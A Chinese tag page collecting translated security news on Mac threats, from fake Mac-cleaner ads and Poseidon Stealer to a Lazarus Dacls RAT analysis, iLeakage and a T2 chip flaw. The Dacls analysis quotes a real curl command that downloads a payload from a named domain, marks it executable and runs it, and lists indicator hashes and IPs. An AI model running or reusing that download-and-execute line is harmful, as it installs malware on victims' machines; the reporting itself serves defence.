标签: Mac

威胁行为者利用谷歌搜索 “Mac 清理工具” 相关广告,诱导用户访问恶意网站

HackerNews 编译,转载请注明出处: 网络犯罪分子借助谷歌搜索广告实施诱骗,让 Mac 用户访问声称可清理设备的虚假网站。 当用户在谷歌中搜索“mac cleaner”或“clear cache macos”等常见关键词时,此类推广广告就会出现,乍一看极具迷惑性。 广告落地页模仿苹果官方网站设计,不仅布局相似,还配有一致的导航菜单。但在专业外观的伪装下,潜藏着针对不知情 Mac 用户的恶意攻击阴谋。 攻击者已在 Medium 及谷歌自有服务等平台发布虚假帖子,传播恶意操作指令,黑客可通过这些指令完全控制受害者设备。 整个攻击活动利用了一种简单却高效的策略:用户普遍信任谷歌的广告审核机制,并且对苹果的设计语言感到熟悉和安心。 用户点击广告后会被重定向至相关页面,页面中充斥着看似专业的操作指引,内容涉及释放磁盘空间、安装系统更新等。 MacKeeper 分析师确认,威胁行为者是通过劫持的谷歌广告账户开展此次攻击活动,且疑似已入侵 Nathaniel Josue Rodriguez 等个人及 Aloha Shirt Shop 等企业的合规广告账户。 恶意软件感染流程 该攻击的核心是一条看似简单却极具破坏力的指令,且该指令被伪装成合规的系统维护操作。 当用户按照页面指示,将提供的命令复制并粘贴到Mac的“终端”应用程序中执行时,便会在无意间触发一次远程代码执行攻击。 该指令链以 “清理 macOS 存储空间”“正在安装组件,请等待” 等看似无害的语句开头,这些均为社会工程学手段,目的是让用户确信自己在执行常规维护操作。 在这些友好提示的背后,隐藏着一段经过Base64编码的文本,其中包含了真实的攻击代码。 系统会通过 base64 命令解码该隐藏文本,解码后文本将转化为实际的 shell 命令,在用户毫不知情且未授权的情况下,从远程服务器下载恶意脚本。 脚本下载后,便会以当前用户的完整权限运行,使得攻击者能够执行多种恶意操作,包括:安装恶意软件、窃取SSH密钥、创建系统后门、进行加密货币挖矿、窃取个人文件,乃至修改关键系统设置。 攻击者还采用了多种混淆技术来隐藏命令实际连接的目的地,从而增加了安全检测的难度。这种伪装下载并自动执行的模式,在专业级的恶意软件活动和供应链攻击中屡见不鲜。 MacKeeper的研究人员已成功识别出这些危险广告并向谷歌报告。目前,谷歌已采取行动,将这些恶意广告从搜索结果中移除。 消息来源:cybersecuritynews: 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文

Poseidon Stealer 恶意软件通过假冒 DeepSeek 网站攻击 Mac 用户

HackerNews 编译,转载请注明出处: eSentire 威胁响应单元(TRU)披露了一项针对 Mac 用户的新活动,该活动利用 Poseidon Stealer 恶意软件。此活动通过假冒合法的 DeepSeek 平台网站,诱骗用户下载并执行恶意负载。 感染始于用户被重定向到假冒的 DeepSeek 网站 deepseek.exploreio[.]net,通常通过恶意广告。该假冒网站与真实的 DeepSeek 网站非常相似,欺骗用户点击 “立即开始” 按钮,这将引导用户进入下载页面。点击 “下载 Mac OS” 后,会下载一个恶意的 DMG 文件。 下载的 DMG 文件包含一个伪装成 DeepSeek 应用程序的 shell 脚本。当用户将此 “应用程序” 拖放到终端时,脚本会执行,绕过 macOS GateKeeper 安全措施。脚本随后下载并执行 Poseidon Stealer 负载。 Poseidon Stealer 是一种恶意软件即服务(MaaS),针对基于 Chromium/Firefox 的浏览器中的敏感数据,包括信用卡、密码、书签和加密货币钱包数据。它还收集系统信息,窃取密钥链数据库,并从桌面、下载和文档目录中窃取文件。 该攻击通过利用终端执行方法绕过了 Gatekeeper 保护。Poseidon Stealer 负载采用反调试和字符串加密技术来阻碍分析。恶意软件还包含检查是否在沙盒或研究环境中运行,如果检测到则会终止自身。 用户应保持警惕,防范假冒软件下载网站,并实施主动安全措施以降低风险。   消息来源:Cybersecurity News; 本文由 HackerNews.cc 翻译整理,封面来源于网络;   转载请注明“转自 HackerNews.cc”并附上原文

欲更新浏览器的 Mac 用户请注意,AMOS 又出一招新“骗术”

近日,Malwarebytes发现有一种专门针对Mac操作系统(OS)的数据窃取程序正通过伪造的网页浏览器更新程序进行分发。Malwarebytes称这与其通常的技术、战术和程序大不相同,该恶意软件可以模仿 Safari 和谷歌 Chrome 浏览器。 网络安全公司表示:AMOS现在正通过利用假冒的Safari与Chrome浏览器更新包来向用户电脑植入恶意软件,这种方法被称为ClearFake。这很可能是该恶意软件第一次主要的社交工程活动之一。该软件之前的活动仅针对 Windows系统,如今不仅在地理位置方面有所变化,在操作系统方面也开始进行了扩展。 用于诱骗 ClearFake 活动受害者的虚假 Safari 浏览器更新 此次事件已经并非是 AMOS 第一次出现在 Malwarebytes 的雷达上。早在今年 9 月,Malwarebytes 就检测到该恶意软件通过虚假广告传播,以诱骗受害者下载。 如果该恶意软件未来传播越来越广泛,将意味着网络上会出现更多的网络犯罪,而幕后的犯罪分子可能从这样的滚雪球效应中获取高额利益。 Malwarebytes表示:随着可利用的被攻击网站列表数量在不断增加,威胁行为者也能够接触到更多受众,从而更大程度地窃取到更多凭证和文件,这些凭证和文件可以立即变现,也可被重新用于其他攻击。 网络安全研究员Randy McEoin于今年 8 月首次发现并命名了 ClearFake 恶意软件活动,此后该活动经历了多次升级,因此 Malwarebytes 认为它是 “最普遍、最危险的社会工程计划之一”。 Malwarebytes 的报告中再次强调,MacOS 如今和 Windows 一样容易受到网络攻击。 Malwarebytes表示:”多年来,Windows用户一直在应对虚假浏览器更新的类似问题。不过目前威胁行为者还并未完全将这个问题扩展到MacOS上。类似AMOS这样的恶意软件,未来只需稍作调整,就能轻易地瞄准其他受害者。   转自Freebuf,原文链接:https://www.freebuf.com/news/384754.html 封面来源于网络,如有侵权请联系删除

新的 iLeakage 攻击可利用 Safari 从 Mac、iPhone 上窃取敏感数据

Hackernews 编译,转载请注明出处: 学术研究人员披露了一种新的类似Spectre的侧信道攻击的细节,该攻击利用Safari从Mac、iPhone和iPad中窃取敏感信息。 这种名为iLeakage的新方法,被描述为一种不定时的推测性执行攻击,它可以诱使Safari呈现任意网页,并从该页面获取信息。 攻击者需要引诱目标Safari用户访问恶意网站,然后该网站会自动打开他们想要窃取信息的网站。这是可能的,因为渲染过程同时处理iLeakage攻击网站和目标网站。 iLeakage是由密歇根大学、佐治亚理工学院和波鸿鲁尔大学的研究人员发现的,他们本周发表了一篇论文,详细介绍了他们的发现。 专家们展示了这种攻击如何用来获取密码和其他敏感信息。他们发布了视频演示,展示了iLeakage攻击如何被用来窃取由密码管理器自动填充的Instagram凭据、Gmail收件箱中的电子邮件主题行以及用户的YouTube观看历史。 研究人员在2022年9月向苹果公司报告了这一发现,但这家科技巨头迄今为止只为macOS上的Safari提供了缓解措施,而且它不是默认启用的,同时还不稳定。 苹果表示,研究人员开发的概念验证推进了该公司对这类威胁的理解。苹果计划在下一个预定的软件发布中进一步解决这个问题。 一方面,没有证据表明iLeakage在野外被利用,这种攻击并不容易进行。研究人员称,实现攻击需要对基于浏览器的侧信道攻击和Safari的实现有深入的了解。 另一方面,专家们指出,这种攻击难以检测,因为它在Safari中运行,不会在系统日志文件中留下任何痕迹。 在macOS上,iLeakage只影响Safari,因为其他浏览器如Edge、Firefox和Chrome使用不同的JavaScript引擎,然而,在iOS上,这种攻击也可以在其他浏览器中使用,因为Chrome、Edge和Firefox基本上是在Safari之上的封装。 研究人员指出,“iLeakage攻击方法表明Spectre攻击仍然是相关的,并且可以被利用,即使在Spectre攻击被发现以来已经进行了近6年的努力去缓解”。     Hackernews 编译,转载请注明出处 消息来源:SecurityWeek,译者:Serene

资深黑客确认:M1 Mac无法在离线时重置设备

在安全性问题上,苹果公司一直走在前列。人在德国的黑客、安全研究专家Jeffrey Paul日前更新博客文章,并详细介绍了对搭载T2安全芯片和M1处理器MacBook的新发现,简单来说,你无法在离线状态下对设备进行重置恢复。 他提到这意味着这些Mac对于某些场景将不再适用,比如气隙系统。 至于具体的原理是,不管你出于何种原因想要重置电脑(遭遇病毒、遭遇死机卡顿、想要卖二手等),T2和M1处理器中的安全单元也需要同步重置,而其重置的前提是拿到苹果下发的一个密钥凭证。 该密钥凭证针对绑定了Apple ID的特定硬件,需要联网从苹果服务器免费获取。这是因为,T2运行了名为BridgeOS的安全子系统,其权限和优先级高于macOS,M1处理器同样。 Paul提到几点担忧,首先是如果想要用M1做孤岛式的网络连接或者安全部署,那已经不可能。其次是,如若苹果服务器在某些国家和地区遭到限制,重置Mac变成天方夜谭。         (消息来源:cnBeta;封面来源于网络)

研究人员警告 T2 芯片存在无法修复的漏洞 导致 Mac 设备易受攻击

据悉,大多数现代 macOS 设备中使用 T2 协处理器,可负责启动和安全相关的操作,以及音频处理等不同的功能。自 2018 年起,苹果已经为自家多款基于英特尔处理器平台的 macOS 设备配备了 T2 安全芯片。然而近日有位网络安全研究人员指出,该芯片存在一个无法修复的漏洞,攻击者或借此轻易获得设备的 root 访问权限。 iMac Pro 主板特写(图自:iFixit) 据 Niels H. 所述,由于 T2 芯片基于苹果 A10 处理器,因而容易受到 iOS 设备同源漏洞攻击(checkm8)的影响。   通常情况下,如果在 DFU 模式下检测到解密调用,T2 芯片将以发生致命错误的形式退出。 但该漏洞利用程序可与 Pangu 开发的另一个漏洞配合使用,以绕过 DFU 的出口安全机制。 对于经验丰富的攻击者来说,显然可借此绕过激活锁定,并执行其它恶意攻击。 一旦被攻击者获得了对 T2 芯片的访问权限,他们将拥有完全的 root 访问和内核执行特权。 即便无法解密受 FileVault 加密保护的文件,但由于 T2 芯片管理着键盘访问,因而还是有可能被注入键盘记录器程序、并窃取用户的相关密码凭证。 固件级的密码也无法幸免,因为这部分还是要用到键盘访问。此外该漏洞或允许通过移动设备管理(MDM)和查找(Find My)功能,以绕过内置的激活锁安全机制。 MacBook Pro 系统截图(来自:Apple Support) 更糟糕的是,苹果也无法在不进行硬件修补的情况下彻底缓解该漏洞。因为出于安全的考量,T2 的基础操作系统(SepOS)是烧录在只读存储器(ROM)上的。 Niels H. 表示其已向苹果公司通报了这些问题,但尚未得到任何回应,感兴趣的朋友可到 IronPeak.be 博客上了解更多细节(传送门)。 聊以慰藉的是,即便该漏洞影响所有基于英特尔处理器和 T2 安全芯片的 Mac 产品,但相关问题并不会持久存在。 因为攻击者首先需要物理接触到用户设备,然后搭配特殊的硬件来执行,比如恶意或定制的 USB-C 线缆。 对于普通用户来说,只需牢记保持物理安全性、不插入未经验证的 USB-C 设备来规避这方面的风险。 至于最新的 Apple Silicon 平台是否也存在着同样的问题,仍有待时间去检验。     (稿源:cnBeta,封面源自网络。)

通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Malwarebytes 报告:2019 Mac 威胁检测呈上升趋势

根据 Malwarebytes 发布的 2019 威胁检测报告,今年针对 Mac 平台的威胁有上升的趋势。在排名前 25 的威胁检测中,有六种针对 Mac 平台,占总量的 16% 。尽管看似并不严重,但鉴于 Mac 用户基数只占 PC 用户群体的 1 / 12,这项发现还是不由地让我们提高了警惕。 Mac 广告软件(图自:Malwarebytes,via MacRumors) 回顾 2019 年,Mac 恶意软件首次闯入了前五,并在其中占据了两席(位列第二和第五)。 首先是被称作 NewTab 的 Mac 广告软件,其占据了跨平台检测总数的 4% 。 作为一款基于浏览器扩展程序来修改网页内容的 Adware,其可在 Chrome 浏览器中找到。 因苹果修改了扩展程序的政策,因此其无法再安装到 Safari 浏览器中。 其次是占总检测量 3% 的 PUP.PCVARK: PUP 指代‘可能不需要的程序’,是用户无意间安装的 Mac 程序的集合。 (Windows / Mac 双平台单机检测量对比) Malwarebytes 指出:2019 年,每台 Mac 检测了 9.8 次,而 Windows PC 仅为 4.2 次。 问题在于,长期以来,许多 Mac 用户以为自己并不需要防病毒软件。若悲观猜测,这些 Mac 可能已经受到了某种可疑的感染。 当然,数据仅采集自已经安装了 Malwarebytes 的设备。在现实生活中,所有 Mac 的总体威胁检测率,可能不如样本数据中那样高。   (稿源:cnBeta,封面源自网络。)

Pwn2Own 2019 黑客竞赛首日:Mac 版 Safari 浏览器再曝两个零日漏洞

本周,第 19 届 CanSecWest 安全会议正在加拿大温哥华举行,同时我们迎来了一年一度的 Pwn2Own 黑客竞赛。周三开始的竞赛中,安全研究人员 Amat Cama 与 Richard Zhu 携手,率先曝光了两个与 Mac 版 Safari 浏览器有关的零日漏洞。其成功地利用了整数堆栈溢出的暴力技术组合来逃离沙箱,获得了 5.5 万美元的奖金。 当天晚些时候,又有三位黑客(Niklas Baumstark、Luca Todesco、以及 Bruno Keith)成功地借助内核提权,攻破了 Safari 浏览器。 尽管他们展示了一套完整的访问,但只能算是部分胜利,因为据说苹果已经知晓了演示的其中一个漏洞。不过最终,他们还是拿到了 4.5 万美元的奖金。   Pwn2Own Vancouver 2019 – Day One Results(via MacRumors) 据悉,在 Pwn2Own 黑客竞赛的第一天,参与者们一共领走了 24 万美元的奖金。第二天的比赛正在进行中,期间发现的所有漏洞报告,都会提交给原公司,以便其对系统进行修补。     (稿源:cnBeta,封面源自网络。)

苹果并不绝对安全 iPhone 可能泄露企业 WiFi 密码

网易科技讯 9月27日消息,许多企业都青睐苹果设备,其中一部分原因就是苹果公司的iPhone和Mac在安全方面有着出色的表现。 就在上周,福布斯杂志透露民主党全国委员会(民主党全国委员会)正在放弃Android,转而使用iOS设备,因为人们担心在中期选举中出现黑客攻击行为。 但苹果设备并不完美。 研究人员周四声称,他们发现了一种通过苹果的产品窃取商业Wi-Fi和应用密码的新方法。 他们破解了苹果旨在帮助公司管理和保护iPhone和Mac的技术。 最近被思科以23.5亿美元收购的安全公司Duo Security的研究人员称,软件漏洞问题在于苹果的设备注册计划(DEP)的开放性。 他们发现,通过在DEP系统中注册恶意设备,可以窃取Wi-Fi密码和更多内部商业机密。 利用Apple的开放性 虽然研究人员利用了苹果的注册技术,但iPhone制造商苹果确实支持在DEP上注册iPhone时的用户身份验证。 但苹果并不绝对要求用户证明他们是谁。 这取决于使用技术的公司对实名注册是否有要求。 注册iPhone设备后,研究人员需要在独立的移动设备管理(MDM)服务器上注册在DEP上注册的iPhone,Mac或tvOS设备。 这既可以保留在硬件内部,也可以保存在公司基于云的服务中。 当使用苹果技术的公司选择不要求身份验证时,黑客可能会找到尚未在公司的MDM服务器上设置的,真实设备的已注册DEP序列号。 研究人员说,这可以通过员工的社会工程检索来获取,也可以检查人们经常发布序列号的MDM产品论坛。 最传统的“暴力破解”方法也可行,计算机可以在DEP上搜索所有可能的数字,直到它击中正确的数字,这是效率最低的一种选择。 然后,攻击者可以使用所选的序列号在MDM服务器上注册他们的恶意设备,并作为合法用户出现在目标公司的网络上。 据研究人员称,随后他们就可以检索受害者业务中的应用程序和Wi-Fi密码。 但是有一个重要的警告:攻击者必须抢在合法员工之前将他们的设备注册到公司的MDM服务器上。 因为MDM服务器每个序列号只能注册一次。 但这可能性实际上还是很大的。 本周晚些时候在布宜诺斯艾利斯举行的Ekoparty会议期间提出攻击技术的詹姆斯巴克莱(James Barclay)说,黑客可以简单地搜索过去90天内生产的所有设备的序列号。 他告诉福布斯杂志:“你找到尚未注册的设备绝对是可行的。“ 不要放弃MDM 巴克莱补充道:“总的来说,这并不意味着你不应该使用DEP或MDM。这些服务提供的好处超过了具有的风险。但苹果和客户可以采取措施来减少这种风险。” 在一篇论文中,研究人员表示,在最新的苹果iPhone和Mac设备上,苹果可以在设备芯片上使用加密技术,在注册DEP时唯一识别该设备。 他们补充说,苹果也可以采用更强大,强制性的身份验证。 巴克莱说,袭击方法是在5月向苹果报道的。 苹果没有透露是否会因研究成果而进行任何更新。 该公司在给福布斯的电子邮件中指出,这些攻击没有利用苹果产品中的任何漏洞。 发言人表示,苹果关于注册设备的说明手册是建议开启身份验证的,许多MDM提供商建议或要求采取此类安全措施。 但巴克莱认为,苹果公司将进行更新以防止此类攻击。 “我不能代表他们计划做什么,但我相信会做出一些改变。”   稿源:网易科技,封面源自网络;